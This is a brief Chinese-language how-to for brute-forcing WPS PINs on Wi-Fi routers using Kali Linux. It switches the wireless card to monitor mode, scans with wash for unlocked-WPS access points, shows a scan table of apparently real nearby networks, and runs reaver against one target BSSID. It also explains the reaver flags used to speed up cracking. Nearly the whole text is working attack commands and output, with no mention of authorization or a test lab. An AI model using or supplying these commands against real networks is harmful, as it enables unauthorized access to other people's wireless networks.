启动网卡到 monitor 模式
# ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
- wlan0:无线网卡的名字
- 操作系统:Kali Linux
扫描开启WPS的WIFI设备
WPS Locked为No的都可以尝试爆破
# wash -i wlan0
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
E6:FF:18:81:FF:DC 11 00 1.0 No TP-LINK5389
F0:FF:29:69:FF:C7 13 00 1.0 No BOBO
40:FF:9F:73:FF:BA 6 00 1.0 No DaoDao
使用reaver开始爆破
# reaver -i wlan0 -b 40:FF:9F:73:FF:BA -S -N -vv -c 6
- 耗时较长,扫描文件保存在/var/lib/reaver目录中
- -i 指定网卡
- -b 指定目标MAC地址
- -S 使用最小的DH key(可以提高PJ速度)
- -c 指定信道可以方便找到信号,如-c 1 指定1信道